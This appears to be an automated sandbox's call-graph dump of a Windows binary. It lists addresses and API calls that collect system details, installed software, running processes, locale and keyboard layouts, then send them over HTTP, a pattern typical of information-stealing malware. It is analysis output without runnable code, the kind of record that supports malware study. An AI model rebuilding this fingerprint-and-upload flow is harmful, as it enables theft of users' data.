14781->14782 14783 be4d47 14782->14783 14784 bfa8a0 lstrcpy 14783->14784 14785 be4d50 14784->14785 14786 bfa920 3 API calls 14785->14786 14787 be4d6e 14786->14787 14788 bfa8a0 lstrcpy 14787->14788 14789 be4d77 14788->14789 14790 bfa740 lstrcpy 14789->14790 14791 be4d92 14790->14791 14792 bfa920 3 API calls 14791->14792 14793 be4db3 14792->14793 14794 bfa920 3 API calls 14793->14794 14795 be4dba 14794->14795 14796 bfa8a0 lstrcpy 14795->14796 14797 be4dc6 14796->14797 14798 be4de7 lstrlen 14797->14798 14799 be4dfa 14798->14799 14800 be4e03 lstrlen 14799->14800 15739 bfaad0 14800->15739 14802 be4e13 HttpSendRequestA 14803 be4e32 InternetReadFile 14802->14803 14804 be4e67 InternetCloseHandle 14803->14804 14809 be4e5e 14803->14809 14806 bfa800 14804->14806 14806->14728 14807 bfa9b0 4 API calls 14807->14809 14808 bfa8a0 lstrcpy 14808->14809 14809->14803 14809->14804 14809->14807 14809->14808 15746 bfaad0 14810->15746 14812 bf17c4 StrCmpCA 14813 bf17cf ExitProcess 14812->14813 14817 bf17d7 14812->14817 14814 bf19c2 14814->13733 14815 bf187f StrCmpCA 14815->14817 14816 bf185d StrCmpCA 14816->14817 14817->14814 14817->14815 14817->14816 14818 bf1913 StrCmpCA 14817->14818 14819 bf1932 StrCmpCA 14817->14819 14820 bf18f1 StrCmpCA 14817->14820 14821 bf1951 StrCmpCA 14817->14821 14822 bf1970 StrCmpCA 14817->14822 14823 bf18cf StrCmpCA 14817->14823 14824 bf18ad StrCmpCA 14817->14824 14825 bfa820 lstrlen lstrcpy 14817->14825 14818->14817 14819->14817 14820->14817 14821->14817 14822->14817 14823->14817 14824->14817 14825->14817 14827 bfa7a0 lstrcpy 14826->14827 14828 be5979 14827->14828 14829 be47b0 2 API calls 14828->14829 14830 be5985 14829->14830 14831 bfa740 lstrcpy 14830->14831 14832 be59ba 14831->14832 14833 bfa740 lstrcpy 14832->14833 14834 be59c7 14833->14834 14835 bfa740 lstrcpy 14834->14835 14836 be59d4 14835->14836 14837 bfa740 lstrcpy 14836->14837 14838 be59e1 14837->14838 14839 bfa740 lstrcpy 14838->14839 14840 be59ee InternetOpenA StrCmpCA 14839->14840 14841 be5a1d 
14840->14841 14842 be5fc3 InternetCloseHandle 14841->14842 14843 bf8b60 3 API calls 14841->14843 14844 be5fe0 14842->14844 14845 be5a3c 14843->14845 14847 be9ac0 4 API calls 14844->14847 14846 bfa920 3 API calls 14845->14846 14848 be5a4f 14846->14848 14849 be5fe6 14847->14849 14850 bfa8a0 lstrcpy 14848->14850 14851 bfa820 2 API calls 14849->14851 14853 be601f ctype 14849->14853 14855 be5a58 14850->14855 14852 be5ffd 14851->14852 14854 bfa9b0 4 API calls 14852->14854 14857 bfa7a0 lstrcpy 14853->14857 14856 be6013 14854->14856 14859 bfa9b0 4 API calls 14855->14859 14858 bfa8a0 lstrcpy 14856->14858 14867 be604f 14857->14867 14858->14853 14860 be5a82 14859->14860 14861 bfa8a0 lstrcpy 14860->14861 14862 be5a8b 14861->14862 14863 bfa9b0 4 API calls 14862->14863 14864 be5aaa 14863->14864 14865 bfa8a0 lstrcpy 14864->14865 14866 be5ab3 14865->14866 14868 bfa920 3 API calls 14866->14868 14867->13739 14869 be5ad1 14868->14869 14870 bfa8a0 lstrcpy 14869->14870 14871 be5ada 14870->14871 14872 bfa9b0 4 API calls 14871->14872 14873 be5af9 14872->14873 14874 bfa8a0 lstrcpy 14873->14874 14875 be5b02 14874->14875 14876 bfa9b0 4 API calls 14875->14876 14877 be5b21 14876->14877 14878 bfa8a0 lstrcpy 14877->14878 14879 be5b2a 14878->14879 14880 bfa9b0 4 API calls 14879->14880 14881 be5b56 14880->14881 14882 bfa920 3 API calls 14881->14882 14883 be5b5d 14882->14883 14884 bfa8a0 lstrcpy 14883->14884 14885 be5b66 14884->14885 14886 be5b7c InternetConnectA 14885->14886 14886->14842 14887 be5bac HttpOpenRequestA 14886->14887 14889 be5c0b 14887->14889 14890 be5fb6 InternetCloseHandle 14887->14890 14891 bfa9b0 4 API calls 14889->14891 14890->14842 14892 be5c1f 14891->14892 14893 bfa8a0 lstrcpy 14892->14893 14894 be5c28 14893->14894 14895 bfa920 3 API calls 14894->14895 14896 be5c46 14895->14896 14897 bfa8a0 lstrcpy 14896->14897 14898 be5c4f 14897->14898 14899 bfa9b0 4 API calls 14898->14899 14900 be5c6e 14899->14900 14901 bfa8a0 lstrcpy 14900->14901 14902 be5c77 14901->14902 14903 bfa9b0 4 API 
calls 14902->14903 14904 be5c98 14903->14904 14905 bfa8a0 lstrcpy 14904->14905 14906 be5ca1 14905->14906 14907 bfa9b0 4 API calls 14906->14907 14908 be5cc1 14907->14908 14909 bfa8a0 lstrcpy 14908->14909 14910 be5cca 14909->14910 14911 bfa9b0 4 API calls 14910->14911 14912 be5ce9 14911->14912 14913 bfa8a0 lstrcpy 14912->14913 14914 be5cf2 14913->14914 14915 bfa920 3 API calls 14914->14915 14916 be5d10 14915->14916 14917 bfa8a0 lstrcpy 14916->14917 14918 be5d19 14917->14918 14919 bfa9b0 4 API calls 14918->14919 14920 be5d38 14919->14920 14921 bfa8a0 lstrcpy 14920->14921 14922 be5d41 14921->14922 14923 bfa9b0 4 API calls 14922->14923 14924 be5d60 14923->14924 14925 bfa8a0 lstrcpy 14924->14925 14926 be5d69 14925->14926 14927 bfa920 3 API calls 14926->14927 14928 be5d87 14927->14928 14929 bfa8a0 lstrcpy 14928->14929 14930 be5d90 14929->14930 14931 bfa9b0 4 API calls 14930->14931 14932 be5daf 14931->14932 14933 bfa8a0 lstrcpy 14932->14933 14934 be5db8 14933->14934 14935 bfa9b0 4 API calls 14934->14935 14936 be5dd9 14935->14936 14937 bfa8a0 lstrcpy 14936->14937 14938 be5de2 14937->14938 14939 bfa9b0 4 API calls 14938->14939 14940 be5e02 14939->14940 14941 bfa8a0 lstrcpy 14940->14941 14942 be5e0b 14941->14942 14943 bfa9b0 4 API calls 14942->14943 14944 be5e2a 14943->14944 14945 bfa8a0 lstrcpy 14944->14945 14946 be5e33 14945->14946 14947 bfa920 3 API calls 14946->14947 14948 be5e54 14947->14948 14949 bfa8a0 lstrcpy 14948->14949 14950 be5e5d 14949->14950 14951 be5e70 lstrlen 14950->14951 15747 bfaad0 14951->15747 14953 be5e81 lstrlen GetProcessHeap RtlAllocateHeap 15748 bfaad0 14953->15748 14955 be5eae lstrlen 14956 be5ebe 14955->14956 14957 be5ed7 lstrlen 14956->14957 14958 be5ee7 14957->14958 14959 be5ef0 lstrlen 14958->14959 14960 be5f04 14959->14960 14961 be5f1a lstrlen 14960->14961 15749 bfaad0 14961->15749 14963 be5f2a HttpSendRequestA 14964 be5f35 InternetReadFile 14963->14964 14965 be5f6a InternetCloseHandle 14964->14965 14969 be5f61 14964->14969 14965->14890 14967 
bfa9b0 4 API calls 14967->14969 14968 bfa8a0 lstrcpy 14968->14969 14969->14964 14969->14965 14969->14967 14969->14968 14972 bf1077 14970->14972 14971 bf1151 14971->13741 14972->14971 14973 bfa820 lstrlen lstrcpy 14972->14973 14973->14972 14979 bf0db7 14974->14979 14975 bf0f17 14975->13749 14976 bf0e27 StrCmpCA 14976->14979 14977 bf0e67 StrCmpCA 14977->14979 14978 bf0ea4 StrCmpCA 14978->14979 14979->14975 14979->14976 14979->14977 14979->14978 14980 bfa820 lstrlen lstrcpy 14979->14980 14980->14979 14982 bf0f67 14981->14982 14983 bf0fb2 StrCmpCA 14982->14983 14984 bf1044 14982->14984 14985 bfa820 lstrlen lstrcpy 14982->14985 14983->14982 14984->13757 14985->14982 14987 bfa740 lstrcpy 14986->14987 14988 bf1a26 14987->14988 14989 bfa9b0 4 API calls 14988->14989 14990 bf1a37 14989->14990 14991 bfa8a0 lstrcpy 14990->14991 14992 bf1a40 14991->14992 14993 bfa9b0 4 API calls 14992->14993 14994 bf1a5b 14993->14994 14995 bfa8a0 lstrcpy 14994->14995 14996 bf1a64 14995->14996 14997 bfa9b0 4 API calls 14996->14997 14998 bf1a7d 14997->14998 14999 bfa8a0 lstrcpy 14998->14999 15000 bf1a86 14999->15000 15001 bfa9b0 4 API calls 15000->15001 15002 bf1aa1 15001->15002 15003 bfa8a0 lstrcpy 15002->15003 15004 bf1aaa 15003->15004 15005 bfa9b0 4 API calls 15004->15005 15006 bf1ac3 15005->15006 15007 bfa8a0 lstrcpy 15006->15007 15008 bf1acc 15007->15008 15009 bfa9b0 4 API calls 15008->15009 15010 bf1ae7 15009->15010 15011 bfa8a0 lstrcpy 15010->15011 15012 bf1af0 15011->15012 15013 bfa9b0 4 API calls 15012->15013 15014 bf1b09 15013->15014 15015 bfa8a0 lstrcpy 15014->15015 15016 bf1b12 15015->15016 15017 bfa9b0 4 API calls 15016->15017 15018 bf1b2d 15017->15018 15019 bfa8a0 lstrcpy 15018->15019 15020 bf1b36 15019->15020 15021 bfa9b0 4 API calls 15020->15021 15022 bf1b4f 15021->15022 15023 bfa8a0 lstrcpy 15022->15023 15024 bf1b58 15023->15024 15025 bfa9b0 4 API calls 15024->15025 15026 bf1b76 15025->15026 15027 bfa8a0 lstrcpy 15026->15027 15028 bf1b7f 15027->15028 15029 bf7500 6 API calls 
15028->15029 15030 bf1b96 15029->15030 15031 bfa920 3 API calls 15030->15031 15032 bf1ba9 15031->15032 15033 bfa8a0 lstrcpy 15032->15033 15034 bf1bb2 15033->15034 15035 bfa9b0 4 API calls 15034->15035 15036 bf1bdc 15035->15036 15037 bfa8a0 lstrcpy 15036->15037 15038 bf1be5 15037->15038 15039 bfa9b0 4 API calls 15038->15039 15040 bf1c05 15039->15040 15041 bfa8a0 lstrcpy 15040->15041 15042 bf1c0e 15041->15042 15750 bf7690 GetProcessHeap RtlAllocateHeap 15042->15750 15045 bfa9b0 4 API calls 15046 bf1c2e 15045->15046 15047 bfa8a0 lstrcpy 15046->15047 15048 bf1c37 15047->15048 15049 bfa9b0 4 API calls 15048->15049 15050 bf1c56 15049->15050 15051 bfa8a0 lstrcpy 15050->15051 15052 bf1c5f 15051->15052 15053 bfa9b0 4 API calls 15052->15053 15054 bf1c80 15053->15054 15055 bfa8a0 lstrcpy 15054->15055 15056 bf1c89 15055->15056 15757 bf77c0 GetCurrentProcess IsWow64Process 15056->15757 15059 bfa9b0 4 API calls 15060 bf1ca9 15059->15060 15061 bfa8a0 lstrcpy 15060->15061 15062 bf1cb2 15061->15062 15063 bfa9b0 4 API calls 15062->15063 15064 bf1cd1 15063->15064 15065 bfa8a0 lstrcpy 15064->15065 15066 bf1cda 15065->15066 15067 bfa9b0 4 API calls 15066->15067 15068 bf1cfb 15067->15068 15069 bfa8a0 lstrcpy 15068->15069 15070 bf1d04 15069->15070 15071 bf7850 3 API calls 15070->15071 15072 bf1d14 15071->15072 15073 bfa9b0 4 API calls 15072->15073 15074 bf1d24 15073->15074 15075 bfa8a0 lstrcpy 15074->15075 15076 bf1d2d 15075->15076 15077 bfa9b0 4 API calls 15076->15077 15078 bf1d4c 15077->15078 15079 bfa8a0 lstrcpy 15078->15079 15080 bf1d55 15079->15080 15081 bfa9b0 4 API calls 15080->15081 15082 bf1d75 15081->15082 15083 bfa8a0 lstrcpy 15082->15083 15084 bf1d7e 15083->15084 15085 bf78e0 3 API calls 15084->15085 15086 bf1d8e 15085->15086 15087 bfa9b0 4 API calls 15086->15087 15088 bf1d9e 15087->15088 15089 bfa8a0 lstrcpy 15088->15089 15090 bf1da7 15089->15090 15091 bfa9b0 4 API calls 15090->15091 15092 bf1dc6 15091->15092 15093 bfa8a0 lstrcpy 15092->15093 15094 bf1dcf 15093->15094 15095 
bfa9b0 4 API calls 15094->15095 15096 bf1df0 15095->15096 15097 bfa8a0 lstrcpy 15096->15097 15098 bf1df9 15097->15098 15759 bf7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15098->15759 15101 bfa9b0 4 API calls 15102 bf1e19 15101->15102 15103 bfa8a0 lstrcpy 15102->15103 15104 bf1e22 15103->15104 15105 bfa9b0 4 API calls 15104->15105 15106 bf1e41 15105->15106 15107 bfa8a0 lstrcpy 15106->15107 15108 bf1e4a 15107->15108 15109 bfa9b0 4 API calls 15108->15109 15110 bf1e6b 15109->15110 15111 bfa8a0 lstrcpy 15110->15111 15112 bf1e74 15111->15112 15761 bf7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15112->15761 15115 bfa9b0 4 API calls 15116 bf1e94 15115->15116 15117 bfa8a0 lstrcpy 15116->15117 15118 bf1e9d 15117->15118 15119 bfa9b0 4 API calls 15118->15119 15120 bf1ebc 15119->15120 15121 bfa8a0 lstrcpy 15120->15121 15122 bf1ec5 15121->15122 15123 bfa9b0 4 API calls 15122->15123 15124 bf1ee5 15123->15124 15125 bfa8a0 lstrcpy 15124->15125 15126 bf1eee 15125->15126 15764 bf7b00 GetUserDefaultLocaleName 15126->15764 15129 bfa9b0 4 API calls 15130 bf1f0e 15129->15130 15131 bfa8a0 lstrcpy 15130->15131 15132 bf1f17 15131->15132 15133 bfa9b0 4 API calls 15132->15133 15134 bf1f36 15133->15134 15135 bfa8a0 lstrcpy 15134->15135 15136 bf1f3f 15135->15136 15137 bfa9b0 4 API calls 15136->15137 15138 bf1f60 15137->15138 15139 bfa8a0 lstrcpy 15138->15139 15140 bf1f69 15139->15140 15768 bf7b90 15140->15768 15142 bf1f80 15143 bfa920 3 API calls 15142->15143 15144 bf1f93 15143->15144 15145 bfa8a0 lstrcpy 15144->15145 15146 bf1f9c 15145->15146 15147 bfa9b0 4 API calls 15146->15147 15148 bf1fc6 15147->15148 15149 bfa8a0 lstrcpy 15148->15149 15150 bf1fcf 15149->15150 15151 bfa9b0 4 API calls 15150->15151 15152 bf1fef 15151->15152 15153 bfa8a0 lstrcpy 15152->15153 15154 bf1ff8 15153->15154 15780 bf7d80 GetSystemPowerStatus 15154->15780 15157 bfa9b0 4 API calls 15158 bf2018 15157->15158 15159 bfa8a0 lstrcpy 15158->15159 15160 bf2021 15159->15160 15161 bfa9b0 4 API calls 
15160->15161 15162 bf2040 15161->15162 15163 bfa8a0 lstrcpy 15162->15163 15164 bf2049 15163->15164 15165 bfa9b0 4 API calls 15164->15165 15166 bf206a 15165->15166 15167 bfa8a0 lstrcpy 15166->15167 15168 bf2073 15167->15168 15169 bf207e GetCurrentProcessId 15168->15169 15782 bf9470 OpenProcess 15169->15782 15172 bfa920 3 API calls 15173 bf20a4 15172->15173 15174 bfa8a0 lstrcpy 15173->15174 15175 bf20ad 15174->15175 15176 bfa9b0 4 API calls 15175->15176 15177 bf20d7 15176->15177 15178 bfa8a0 lstrcpy 15177->15178 15179 bf20e0 15178->15179 15180 bfa9b0 4 API calls 15179->15180 15181 bf2100 15180->15181 15182 bfa8a0 lstrcpy 15181->15182 15183 bf2109 15182->15183 15787 bf7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15183->15787 15186 bfa9b0 4 API calls 15187 bf2129 15186->15187 15188 bfa8a0 lstrcpy 15187->15188 15189 bf2132 15188->15189 15190 bfa9b0 4 API calls 15189->15190 15191 bf2151 15190->15191 15192 bfa8a0 lstrcpy 15191->15192 15193 bf215a 15192->15193 15194 bfa9b0 4 API calls 15193->15194 15195 bf217b 15194->15195 15196 bfa8a0 lstrcpy 15195->15196 15197 bf2184 15196->15197 15791 bf7f60 15197->15791 15200 bfa9b0 4 API calls 15201 bf21a4 15200->15201 15202 bfa8a0 lstrcpy 15201->15202 15203 bf21ad 15202->15203 15204 bfa9b0 4 API calls 15203->15204 15205 bf21cc 15204->15205 15206 bfa8a0 lstrcpy 15205->15206 15207 bf21d5 15206->15207 15208 bfa9b0 4 API calls 15207->15208 15209 bf21f6 15208->15209 15210 bfa8a0 lstrcpy 15209->15210 15211 bf21ff 15210->15211 15804 bf7ed0 GetSystemInfo wsprintfA 15211->15804 15214 bfa9b0 4 API calls 15215 bf221f 15214->15215 15216 bfa8a0 lstrcpy 15215->15216 15217 bf2228 15216->15217 15218 bfa9b0 4 API calls 15217->15218 15219 bf2247 15218->15219 15220 bfa8a0 lstrcpy 15219->15220 15221 bf2250 15220->15221 15222 bfa9b0 4 API calls 15221->15222 15223 bf2270 15222->15223 15224 bfa8a0 lstrcpy 15223->15224 15225 bf2279 15224->15225 15806 bf8100 GetProcessHeap RtlAllocateHeap 15225->15806 15228 bfa9b0 4 API calls 15229 bf2299 15228->15229 
15230 bfa8a0 lstrcpy 15229->15230 15231 bf22a2 15230->15231 15232 bfa9b0 4 API calls 15231->15232 15233 bf22c1 15232->15233 15234 bfa8a0 lstrcpy 15233->15234 15235 bf22ca 15234->15235 15236 bfa9b0 4 API calls 15235->15236 15237 bf22eb 15236->15237 15238 bfa8a0 lstrcpy 15237->15238 15239 bf22f4 15238->15239 15812 bf87c0 15239->15812 15242 bfa920 3 API calls 15243 bf231e 15242->15243 15244 bfa8a0 lstrcpy 15243->15244 15245 bf2327 15244->15245 15246 bfa9b0 4 API calls 15245->15246 15247 bf2351 15246->15247 15248 bfa8a0 lstrcpy 15247->15248 15249 bf235a 15248->15249 15250 bfa9b0 4 API calls 15249->15250 15251 bf237a 15250->15251 15252 bfa8a0 lstrcpy 15251->15252 15253 bf2383 15252->15253 15254 bfa9b0 4 API calls 15253->15254 15255 bf23a2 15254->15255 15256 bfa8a0 lstrcpy 15255->15256 15257 bf23ab 15256->15257 15817 bf81f0 15257->15817 15259 bf23c2 15260 bfa920 3 API calls 15259->15260 15261 bf23d5 15260->15261 15262 bfa8a0 lstrcpy 15261->15262 15263 bf23de 15262->15263 15264 bfa9b0 4 API calls 15263->15264 15265 bf240a 15264->15265 15266 bfa8a0 lstrcpy 15265->15266 15267 bf2413 15266->15267 15268 bfa9b0 4 API calls 15267->15268 15269 bf2432 15268->15269 15270 bfa8a0 lstrcpy 15269->15270 15271 bf243b 15270->15271 15272 bfa9b0 4 API calls 15271->15272 15273 bf245c 15272->15273 15274 bfa8a0 lstrcpy 15273->15274 15275 bf2465 15274->15275 15276 bfa9b0 4 API calls 15275->15276 15277 bf2484 15276->15277 15278 bfa8a0 lstrcpy 15277->15278 15279 bf248d 15278->15279 15280 bfa9b0 4 API calls 15279->15280 15281 bf24ae 15280->15281 15282 bfa8a0 lstrcpy 15281->15282 15283 bf24b7 15282->15283 15825 bf8320 15283->15825 15285 bf24d3 15286 bfa920 3 API calls 15285->15286 15287 bf24e6 15286->15287 15288 bfa8a0 lstrcpy 15287->15288 15289 bf24ef 15288->15289 15290 bfa9b0 4 API calls 15289->15290 15291 bf2519 15290->15291 15292 bfa8a0 lstrcpy 15291->15292 15293 bf2522 15292->15293 15294 bfa9b0 4 API calls 15293->15294 15295 bf2543 15294->15295 15296 bfa8a0 lstrcpy 15295->15296 15297 bf254c 
15296->15297 15298 bf8320 17 API calls 15297->15298 15299 bf2568 15298->15299 15300 bfa920 3 API calls 15299->15300 15301 bf257b 15300->15301 15302 bfa8a0 lstrcpy 15301->15302 15303 bf2584 15302->15303 15304 bfa9b0 4 API calls 15303->15304 15305 bf25ae 15304->15305 15306 bfa8a0 lstrcpy 15305->15306 15307 bf25b7 15306->15307 15308 bfa9b0 4 API calls 15307->15308 15309 bf25d6 15308->15309 15310 bfa8a0 lstrcpy 15309->15310 15311 bf25df 15310->15311 15312 bfa9b0 4 API calls 15311->15312 15313 bf2600 15312->15313 15314 bfa8a0 lstrcpy 15313->15314 15315 bf2609 15314->15315 15861 bf8680 15315->15861 15317 bf2620 15318 bfa920 3 API calls 15317->15318 15319 bf2633 15318->15319 15320 bfa8a0 lstrcpy 15319->15320 15321 bf263c 15320->15321 15322 bf265a lstrlen 15321->15322 15323 bf266a 15322->15323 15324 bfa740 lstrcpy 15323->15324 15325 bf267c 15324->15325 15326 be1590 lstrcpy 15325->15326 15327 bf268d 15326->15327 15871 bf5190 15327->15871 15329 bf2699 15329->13761 16059 bfaad0 15330->16059 15332 be5009 InternetOpenUrlA 15336 be5021 15332->15336 15333 be502a InternetReadFile 15333->15336 15334 be50a0 InternetCloseHandle InternetCloseHandle 15335 be50ec 15334->15335 15335->13765 15336->15333 15336->15334 16060 be98d0 15337->16060 15339 bf0759 15340 bf077d 15339->15340 15341 bf0a38 15339->15341 15343 bf0799 StrCmpCA 15340->15343 15342 be1590 lstrcpy 15341->15342 15344 bf0a49 15342->15344 15345 bf0843 15343->15345 15346 bf07a8 15343->15346 16236 bf0250 15344->16236 15350 bf0865 StrCmpCA 15345->15350 15349 bfa7a0 lstrcpy 15346->15349 15351 bf07c3 15349->15351 15352 bf0874 15350->15352 15389 bf096b 15350->15389 15353 be1590 lstrcpy 15351->15353 15354 bfa740 lstrcpy 15352->15354 15355 bf080c 15353->15355 15357 bf0881 15354->15357 15358 bfa7a0 lstrcpy 15355->15358 15356 bf099c StrCmpCA 15359 bf09ab 15356->15359 15378 bf0a2d 15356->15378 15360 bfa9b0 4 API calls 15357->15360 15361 bf0823 15358->15361 15362 be1590 lstrcpy 15359->15362 15363 bf08ac 15360->15363 15364 bfa7a0 lstrcpy 
15361->15364 15365 bf09f4 15362->15365 15366 bfa920 3 API calls 15363->15366 15367 bf083e 15364->15367 15368 bfa7a0 lstrcpy 15365->15368 15369 bf08b3 15366->15369 16063 befb00 15367->16063 15371 bf0a0d 15368->15371 15372 bfa9b0 4 API calls 15369->15372 15373 bfa7a0 lstrcpy 15371->15373 15374 bf08ba 15372->15374 15375 bf0a28 15373->15375 15378->13769 15389->15356 15711 bfa7a0 lstrcpy 15710->15711 15712 be1683 15711->15712 15713 bfa7a0 lstrcpy 15712->15713 15714 be1695 15713->15714 15715 bfa7a0 lstrcpy 15714->15715 15716 be16a7 15715->15716 15717 bfa7a0 lstrcpy 15716->15717 15718 be15a3 15717->15718 15718->14592 15720 be47c6 15719->15720 15721 be4838 lstrlen 15720->15721 15745 bfaad0 15721->15745 15723 be4848 InternetCrackUrlA 15724 be4867 15723->15724 15724->14669 15726 bfa740 lstrcpy 15725->15726 15727 bf8b74 15726->15727 15728 bfa740 lstrcpy 15727->15728 15729 bf8b82 GetSystemTime 15728->15729 15731 bf8b99 15729->15731 15730 bfa7a0 lstrcpy 15732 bf8bfc 15730->15732 15731->15730 15732->14684 15734 bfa931 15733->15734 15735 bfa988 15734->15735 15737 bfa968 lstrcpy lstrcat 15734->15737 15736 bfa7a0 lstrcpy 15735->15736 15738 bfa994 15736->15738 15737->15735 15738->14687 15739->14802 15741 be4eee 15740->15741 15742 be9af9 LocalAlloc 15740->15742 15741->14690 15741->14692 15742->15741 15743 be9b14 CryptStringToBinaryA 15742->15743 15743->15741 15744 be9b39 LocalFree 15743->15744 15744->15741 15745->15723 15746->14812 15747->14953 15748->14955 15749->14963 15878 bf77a0 15750->15878 15753 bf1c1e 15753->15045 15754 bf76c6 RegOpenKeyExA 15755 bf76e7 RegQueryValueExA 15754->15755 15756 bf7704 RegCloseKey 15754->15756 15755->15756 15756->15753 15758 bf1c99 15757->15758 15758->15059 15760 bf1e09 15759->15760 15760->15101 15762 bf7a9a wsprintfA 15761->15762 15763 bf1e84 15761->15763 15762->15763 15763->15115 15765 bf7b4d 15764->15765 15766 bf1efe 15764->15766 15885 bf8d20 LocalAlloc CharToOemW 15765->15885 15766->15129 15769 bfa740 lstrcpy 15768->15769 15770 bf7bcc 
GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15769->15770 15779 bf7c25 15770->15779 15771 bf7d18 15773 bf7d1e LocalFree 15771->15773 15774 bf7d28 15771->15774 15772 bf7c46 GetLocaleInfoA 15772->15779 15773->15774 15775 bfa7a0 lstrcpy 15774->15775 15778 bf7d37 15775->15778 15776 bfa8a0 lstrcpy 15776->15779 15777 bfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15777->15779 15778->15142 15779->15771 15779->15772 15779->15776 15779->15777 15781 bf2008 15780->15781 15781->15157 15783 bf94b5 15782->15783 15784 bf9493 GetModuleFileNameExA CloseHandle 15782->15784 15785 bfa740 lstrcpy 15783->15785 15784->15783 15786 bf2091 15785->15786 15786->15172 15788 bf7e68 RegQueryValueExA 15787->15788 15790 bf2119 15787->15790 15789 bf7e8e RegCloseKey 15788->15789 15789->15790 15790->15186 15792 bf7fb9 GetLogicalProcessorInformationEx 15791->15792 15793 bf7fd8 GetLastError 15792->15793 15800 bf8029 15792->15800 15794 bf8022 15793->15794 15803 bf7fe3 15793->15803 15797 bf2194 15794->15797 15799 bf89f0 2 API calls 15794->15799 15797->15200 15798 bf89f0 2 API calls 15801 bf807b 15798->15801 15799->15797 15800->15798 15801->15794 15802 bf8084 wsprintfA 15801->15802 15802->15797 15803->15792 15803->15797 15886 bf89f0 15803->15886 15889 bf8a10 GetProcessHeap RtlAllocateHeap 15803->15889 15805 bf220f 15804->15805 15805->15214 15807 bf89b0 15806->15807 15808 bf814d GlobalMemoryStatusEx 15807->15808 15809 bf8163 15808->15809 15810 bf819b wsprintfA 15809->15810 15811 bf2289 15810->15811 15811->15228 15813 bf87fb GetProcessHeap RtlAllocateHeap wsprintfA 15812->15813 15815 bfa740 lstrcpy 15813->15815 15816 bf230b 15815->15816 15816->15242 15818 bfa740 lstrcpy 15817->15818 15822 bf8229 15818->15822 15819 bf8263 15821 bfa7a0 lstrcpy 15819->15821 15820 bfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15820->15822 15823 bf82dc 15821->15823 15822->15819 15822->15820 15824 bfa8a0 lstrcpy 15822->15824 15823->15259 15824->15822 15826 bfa740 lstrcpy 15825->15826 15827 bf835c RegOpenKeyExA 15826->15827 15828 
bf83ae 15827->15828 15829 bf83d0 15827->15829 15830 bfa7a0 lstrcpy 15828->15830 15831 bf83f8 RegEnumKeyExA 15829->15831 15832 bf8613 RegCloseKey 15829->15832 15841 bf83bd 15830->15841 15833 bf843f wsprintfA RegOpenKeyExA 15831->15833 15834 bf860e 15831->15834 15835 bfa7a0 lstrcpy 15832->15835 15836 bf8485 RegCloseKey RegCloseKey 15833->15836 15837 bf84c1 RegQueryValueExA 15833->15837 15834->15832 15835->15841 15838 bfa7a0 lstrcpy 15836->15838 15839 bf84fa lstrlen 15837->15839 15840 bf8601 RegCloseKey 15837->15840 15838->15841 15839->15840 15842 bf8510 15839->15842 15840->15834 15841->15285 15843 bfa9b0 4 API calls 15842->15843 15844 bf8527 15843->15844 15845 bfa8a0 lstrcpy 15844->15845 15846 bf8533 15845->15846 15847 bfa9b0 4 API calls 15846->15847 15848 bf8557 15847->15848 15849 bfa8a0 lstrcpy 15848->15849 15850 bf8563 15849->15850 15851 bf856e RegQueryValueExA 15850->15851 15851->15840 15852 bf85a3 15851->15852 15853 bfa9b0 4 API calls 15852->15853 15854 bf85ba 15853->15854 15855 bfa8a0 lstrcpy 15854->15855 15856 bf85c6 15855->15856 15857 bfa9b0 4 API calls 15856->15857 15858 bf85ea 15857->15858 15859 bfa8a0 lstrcpy 15858->15859 15860 bf85f6 15859->15860 15860->15840 15862 bfa740 lstrcpy 15861->15862 15863 bf86bc CreateToolhelp32Snapshot Process32First 15862->15863 15864 bf875d CloseHandle 15863->15864 15865 bf86e8 Process32Next 15863->15865 15866 bfa7a0 lstrcpy 15864->15866 15865->15864 15870 bf86fd 15865->15870 15868 bf8776 15866->15868 15867 bfa8a0 lstrcpy 15867->15870 15868->15317 15869 bfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15869->15870 15870->15865 15870->15867 15870->15869 15872 bfa7a0 lstrcpy 15871->15872 15873 bf51b5 15872->15873 15874 be1590 lstrcpy 15873->15874 15875 bf51c6 15874->15875 15890 be5100 15875->15890 15877 bf51cf 15877->15329 15881 bf7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15878->15881 15880 bf76b9 15880->15753 15880->15754 15882 bf7765 RegQueryValueExA 15881->15882 15883 bf7780 RegCloseKey 15881->15883 15882->15883 15884 bf7793 
15883->15884 15884->15880 15885->15766 15887 bf8a0c 15886->15887 15888 bf89f9 GetProcessHeap HeapFree 15886->15888 15887->15803 15888->15887 15889->15803 15891 bfa7a0 lstrcpy 15890->15891 15892 be5119 15891->15892 15893 be47b0 2 API calls 15892->15893 15894 be5125 15893->15894 16050 bf8ea0 15894->16050 15896 be5184 15897 be5192 lstrlen 15896->15897 15898 be51a5 15897->15898 15899 bf8ea0 4 API calls 15898->15899 15900 be51b6 15899->15900 15901 bfa740 lstrcpy 15900->15901 15902 be51c9 15901->15902 15903 bfa740 lstrcpy 15902->15903 15904 be51d6 15903->15904 15905 bfa740 lstrcpy 15904->15905 15906 be51e3 15905->15906 15907 bfa740 lstrcpy 15906->15907 15908 be51f0 15907->15908 15909 bfa740 lstrcpy 15908->15909 15910 be51fd InternetOpenA StrCmpCA 15909->15910 15911 be522f 15910->15911 15912 be58c4 InternetCloseHandle 15911->15912 15913 bf8b60 3 API calls 15911->15913 15919 be58d9 ctype 15912->15919 15914 be524e 15913->15914 15915 bfa920 3 API calls 15914->15915 15916 be5261 15915->15916 15917 bfa8a0 lstrcpy 15916->15917 15918 be526a 15917->15918 15920 bfa9b0 4 API calls 15918->15920 15923 bfa7a0 lstrcpy 15919->15923 15921 be52ab 15920->15921 15922 bfa920 3 API calls 15921->15922 15924 be52b2 15922->15924 15931 be5913 15923->15931 15925 bfa9b0 4 API calls 15924->15925 15926 be52b9 15925->15926 15927 bfa8a0 lstrcpy 15926->15927 15928 be52c2 15927->15928 15929 bfa9b0 4 API calls 15928->15929 15930 be5303 15929->15930 15932 bfa920 3 API calls 15930->15932 15931->15877 15933 be530a 15932->15933 15934 bfa8a0 lstrcpy 15933->15934 15935 be5313 15934->15935 15936 be5329 InternetConnectA 15935->15936 15936->15912 15937 be5359 HttpOpenRequestA 15936->15937 15939 be58b7 